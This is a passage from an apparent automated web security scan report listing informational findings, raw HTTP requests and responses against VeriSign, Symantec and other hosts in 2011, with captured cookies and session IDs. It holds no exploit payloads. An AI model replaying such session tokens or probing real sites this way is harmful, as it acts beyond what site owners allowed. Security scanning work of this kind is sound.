s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B
Response
HTTP/1.1 404 Not found Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 22:03:55 GMT Content-length: 1214 Content-type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN"> <HTML> <HEAD> <TITLE>Error 404--Not Found</TITLE> <META NAME="GENERATOR" CONTENT="WebLogic Server"> </HEAD> <BODY bgcolor="white"> <FONT FACE=He...[SNIP]...
22.23. https://knowledge.verisign.ch/support/ssl-certificates-support/index
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index
Request
GET /support/ssl-certificates-support/index HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Fri, 09 Sep 2011 21:42:30 GMT Server: Apache-Coyote/1.1 Content-Type: text/html Connection: close <!-- <script type="text/javascript" language="javascript"> window.location = window.location.protocol + "//" + window.location.host + "/" + "custom404"; //--> </script>
22.24. https://knowledge.verisign.com/support/code-signing-support/index
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/code-signing-support/index
Request
GET /support/code-signing-support/index HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Fri, 09 Sep 2011 21:44:29 GMT Server: Apache-Coyote/1.1 Content-Type: text/html Connection: close <!-- <script type="text/javascript" language="javascript"> window.location = window.location.protocol + "//" + window.location.host + "/" + "custom404"; //--> </script>
22.25. https://knowledge.verisign.com/support/mpki-for-ssl-support/index
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/mpki-for-ssl-support/index
Request
GET /support/mpki-for-ssl-support/index HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Fri, 09 Sep 2011 21:44:38 GMT Server: Apache-Coyote/1.1 Content-Type: text/html Connection: close <!-- <script type="text/javascript" language="javascript"> window.location = window.location.protocol + "//" + window.location.host + "/" + "custom404"; //--> </script>
22.26. https://knowledge.verisign.com/support/ssl-certificates-support/index
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/ssl-certificates-support/index
Request
GET /support/ssl-certificates-support/index HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Fri, 09 Sep 2011 21:43:54 GMT Server: Apache-Coyote/1.1 Content-Type: text/html Connection: close <!-- <script type="text/javascript" language="javascript"> window.location = window.location.protocol + "//" + window.location.host + "/" + "custom404"; //--> </script>
22.27. http://partnerlocator.symantec.com/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://partnerlocator.symantec.com
Path:
/
Request
GET / HTTP/1.1 Host: partnerlocator.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 503 Service Temporarily Unavailable Server: nginx/0.8.54 Date: Fri, 09 Sep 2011 21:46:04 GMT Content-Type: text/html Content-Length: 615 Connection: close <html> <head><title>503 Service Temporarily Unavailable</title></head> <body bgcolor="white"> <center><h1>503 Service Temporarily Unavailable</h1></center> <hr><center>nginx/0.8.54</center> </bod...[SNIP]...
22.28. http://partnerlocator.symantec.com/public/product_finder
Summary
Severity:
Information
Confidence:
Certain
Host:
http://partnerlocator.symantec.com
Path:
/public/product_finder
Request
GET /public/product_finder HTTP/1.1 Host: partnerlocator.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Fri, 09 Sep 2011 21:45:58 GMT Content-Type: text/html Connection: close Content-Length: 34 <h1>500 Internal Server Error</h1>
22.29. http://partnerlocator.symantec.com/public/pulldown_list
Summary
Severity:
Information
Confidence:
Certain
Host:
http://partnerlocator.symantec.com
Path:
/public/pulldown_list
Request
GET /public/pulldown_list;plist=country;search_term=un;country=;locale=en-us;container=pulldown_list;value_id=country;text_id=country_name HTTP/1.1 Host: partnerlocator.symantec.com Proxy-Connection: keep-alive Referer: http://partnerlocator.symantec.com/public/search X-Prototype-Version: 1.5.0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; s_pers=%20s_nr%3D1315622094388-New%7C1336358094388%3B%20event69%3Devent69%7C1336358094390%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/10; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymanteccom%252Cveritasnonconsumer%252Csymantecpartner%253D%252526pid%25253Den/us%2525253A%25252520plocator%2525253A%25252520public%2525253A%25252520select%25252520country%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bhide_initial_text_new%25252528%25252527country_name%25252527%2525252C%25252527country%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%3B
Response
HTTP/1.1 503 Service Temporarily Unavailable Server: nginx/0.8.54 Date: Fri, 09 Sep 2011 21:37:52 GMT Content-Type: text/html Content-Length: 615 Connection: keep-alive <html> <head><title>503 Service Temporarily Unavailable</title></head> <body bgcolor="white"> <center><h1>503 Service Temporarily Unavailable</h1></center> <hr><center>nginx/0.8.54</center> </bod...[SNIP]...
22.30. http://partnerlocator.symantec.com/public/search
Summary
Severity:
Information
Confidence:
Certain
Host:
http://partnerlocator.symantec.com
Path:
/public/search
Request
POST /public/search HTTP/1.1 Host: partnerlocator.symantec.com Proxy-Connection: keep-alive Referer: http://partnerlocator.symantec.com/public/search Content-Length: 85 Cache-Control: max-age=0 Origin: http://partnerlocator.symantec.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; s_pers=%20s_nr%3D1315622094388-New%7C1336358094388%3B%20event69%3Devent69%7C1336358094390%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/10; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymanteccom%252Cveritasnonconsumer%252Csymantecpartner%253D%252526pid%25253Den/us%2525253A%25252520plocator%2525253A%25252520public%2525253A%25252520select%25252520country%252526pidt%25253D1%252526oid%25253Djavascript%2525253Arequired_country_with_submit%25252528document.select_country%2525252C%25252527Please%25252520select%25252520a%25252520country.%25252527%25252529%2525253B%252526ot%25253DA%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%3B locale=en-us&country=United+Arab+Emirates&country_name=United+Arab+Emirates+&_search=
Response
HTTP/1.1 503 Service Temporarily Unavailable Server: nginx/0.8.54 Date: Fri, 09 Sep 2011 21:37:58 GMT Content-Type: text/html Content-Length: 615 Connection: keep-alive <html> <head><title>503 Service Temporarily Unavailable</title></head> <body bgcolor="white"> <center><h1>503 Service Temporarily Unavailable</h1></center> <hr><center>nginx/0.8.54</center> </bod...[SNIP]...
22.31. https://partnernet.symantec.com/
Summary
Severity:
Information
Confidence:
Certain
Host:
https://partnernet.symantec.com
Path:
/
Request
GET / HTTP/1.1 Host: partnernet.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:06 GMT Server: Apache/2.2.15 (Unix) Last-Modified: Thu, 12 May 2011 19:48:14 GMT ETag: "70c638-47-4a3197842db80" Accept-Ranges: bytes Content-Length: 71 Connection: close Content-Type: text/html <meta http-equiv="refresh" content="0; URL=/Partnercontent/Login.jsp">
22.32. http://player.ooyala.com/info/primary/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://player.ooyala.com
Path:
/info/primary/
Request
GET /info/primary/ HTTP/1.1 Host: player.ooyala.com Proxy-Connection: keep-alive Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response
HTTP/1.1 200 OK Content-Type: text/html Content-Length: 381 Date: Fri, 09 Sep 2011 21:25:47 GMT Connection: close Vary: Accept-Encoding LyG84k55cH2qqKsCKThF9pIijz6kuooWXzBwi9wecPfEPAb+op9VqIT30K4Omw9FS2j9ClUiAsNd8muh3VILcB/oegr3a9DNHzbEfr7bY7e6ft43EYvUZ6Z/M4aTleS1sueeKUT5r1E1J565p/d9dd+RujgJ9ulqu6caTPLzBBFWjbj7inLKstRg2gNeQtI6MOQvakLZ...[SNIP]...
22.33. https://policy3.responsys.net/
Summary
Severity:
Information
Confidence:
Certain
Host:
https://policy3.responsys.net
Path:
/
Request
GET / HTTP/1.1 Host: policy3.responsys.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:40:00 GMT Server: Apache Last-Modified: Wed, 19 May 2010 07:38:58 GMT ETag: "2ef9310-155-486ed8d030880" Accept-Ranges: bytes Content-Length: 341 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html><head><title>Permission Policy</title> <meta http-equiv="Refresh" content="0; URL=./permission.htm" <meta http-equiv="Content-Ty...[SNIP]...
22.34. https://renewals.symantec.com/renewals/chat_norton.jsp
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/chat_norton.jsp
Request
GET /renewals/chat_norton.jsp HTTP/1.1 Host: renewals.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:25 GMT Content-Length: 1638 Content-Type: text/html Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="EN" xml:lang="EN"> <head>...[SNIP]...
22.35. https://securitycenter.verisign.com/
Summary
Severity:
Information
Confidence:
Certain
Host:
https://securitycenter.verisign.com
Path:
/
Request
GET / HTTP/1.1 Host: securitycenter.verisign.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=OqE1WkhKCKMQP1p2JJzrZf2h3PXz1qghWLRzUhS1WUJUiNzxbzTT!-1800460983
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:27:41 GMT Content-length: 129 Content-type: text/html Last-modified: Thu, 23 Dec 2004 19:39:49 GMT Etag: "81-41cb1f05" Accept-ranges: bytes <html> <head> <meta http-equiv="Refresh" content="0; url=https://www.verisign.com/products/site/"> </head> <body></body> </html>
22.36. https://securitycenter.verisign.com/celp/enroll/orderStatus
Summary
Severity:
Information
Confidence:
Certain
Host:
https://securitycenter.verisign.com
Path:
/celp/enroll/orderStatus
Request
GET /celp/enroll/orderStatus HTTP/1.1 Host: securitycenter.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:46:32 GMT Content-length: 408 Content-type: text/html Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT Accept-Ranges: bytes Connection: close <html> <head> <title>VeriSign Retail</title> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1"> </head> <body bgcolor="#ffffff"> <h1>System Unavailable</h1>...[SNIP]...
22.37. https://securitycenter.verisign.com/celp/enroll/outsideSearch
Summary
Severity:
Information
Confidence:
Certain
Host:
https://securitycenter.verisign.com
Path:
/celp/enroll/outsideSearch
Request
GET /celp/enroll/outsideSearch HTTP/1.1 Host: securitycenter.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:46:33 GMT Content-length: 408 Content-type: text/html Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT Set-Cookie: JSESSIONID=OqJ57BcEDySGMZg17yokdHt03FquFgyYGEezg44I0uZ1diTyCIN7!-1800460983; path=/ Accept-Ranges: bytes Connection: close <html> <head> <title>VeriSign Retail</title> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1"> </head> <body bgcolor="#ffffff"> <h1>System Unavailable</h1>...[SNIP]...
22.38. https://securitycenter.verisign.com/celp/enroll/retail
Summary
Severity:
Information
Confidence:
Certain
Host:
https://securitycenter.verisign.com
Path:
/celp/enroll/retail
Request
GET /celp/enroll/retail;jsessionid=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983 HTTP/1.1 Host: securitycenter.verisign.com Connection: keep-alive Referer: http://www.verisign.com/code-signing/index.html?tid=a_box User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:27:17 GMT Content-length: 408 Content-type: text/html Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT Accept-Ranges: bytes <html> <head> <title>VeriSign Retail</title> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1"> </head> <body bgcolor="#ffffff"> <h1>System Unavailable</h1>...[SNIP]...
22.39. https://securitycenter.verisign.com/celp/enroll/upsell
Summary
Severity:
Information
Confidence:
Certain
Host:
https://securitycenter.verisign.com
Path:
/celp/enroll/upsell
Request
GET /celp/enroll/upsell HTTP/1.1 Host: securitycenter.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:46:32 GMT Content-length: 408 Content-type: text/html Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT Set-Cookie: JSESSIONID=OqJ4o0r1eq0XdEuNa8cCA2iDyk4r5r7iuywwlssiJ0mmB13GoVxZ!-1800460983; path=/ Accept-Ranges: bytes Connection: close <html> <head> <title>VeriSign Retail</title> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1"> </head> <body bgcolor="#ffffff"> <h1>System Unavailable</h1>...[SNIP]...
22.40. https://trust-center.verisign.com/rcm/TeaLeafTarget.html
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/TeaLeafTarget.html
Request
POST /rcm/TeaLeafTarget.html HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 Content-Length: 1103 X-TeaLeaf-Page-Objects: 0 Origin: https://trust-center.verisign.com X-TeaLeaf-Page-Img-Fail: 1 X-TeaLeaf-Page-Render: 123 X-TeaLeaf: ClientEvent X-TeaLeaf-UIEventCapture-Version: 2009.11.17.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: text/xml X-TeaLeaf-Screen-Res: 4 X-TeaLeafType: PERFORMANCE X-TeaLeafSubType: undefined; INIT X-TeaLeaf-Page-Url: /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941 X-TeaLeaf-Browser-Res: 3 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719 <ClientEventSet PostTimeStamp="1315621658502" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID21H27M8S358R0.8013692023232579" TimeDuration="123" DateSince1970="1315621628481" > ...[SNIP]...
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:10 GMT Server: Apache Set-Cookie: TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 32 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html <html> <body> OK </body> </html>
22.41. http://www.verisign.ch/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/
Request
GET /?tid=header-logo HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621600|session#1315621535113-743172#1315623400; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.2.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 31344 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]...
22.42. http://www.verisign.ch/assets/global/js/leftnav.js
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/assets/global/js/leftnav.js
Request
GET /assets/global/js/leftnav.js HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:03 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Length: 4994 Content-Type: text/html /** * Version 2.0 * Author: Rob Perez * Date: August 20, 2010 * * Usage: * * Set a flag at the beginning of generateLeftNav to modify expansion behavior of the nav if desired. * * Somew...[SNIP]...
22.43. http://www.verisign.ch/assets/shared/js/jquery.url.packed.js
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/assets/shared/js/jquery.url.packed.js
Request
GET /assets/shared/js/jquery.url.packed.js HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:03 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Length: 1935 Content-Type: text/html jQuery.url=function(){var segments={};var parsed={};var options={url:window.location,strictMode:false,key:["source","protocol","authority","userInfo","user","password","host","port","relative","path",...[SNIP]...
22.44. http://www.verisign.ch/assets/shared/js/leftnav_new.js
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/assets/shared/js/leftnav_new.js
Request
GET /assets/shared/js/leftnav_new.js HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:44 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Length: 4994 Content-Type: text/html /** * Version 2.0 * Author: Rob Perez * Date: August 20, 2010 * * Usage: * * Set a flag at the beginning of generateLeftNav to modify expansion behavior of the nav if desired. * * Somew...[SNIP]...
22.45. http://www.verisign.ch/corporate/index.html
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/corporate/index.html
Request
GET /corporate/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621596|session#1315621535113-743172#1315623396; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.1.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
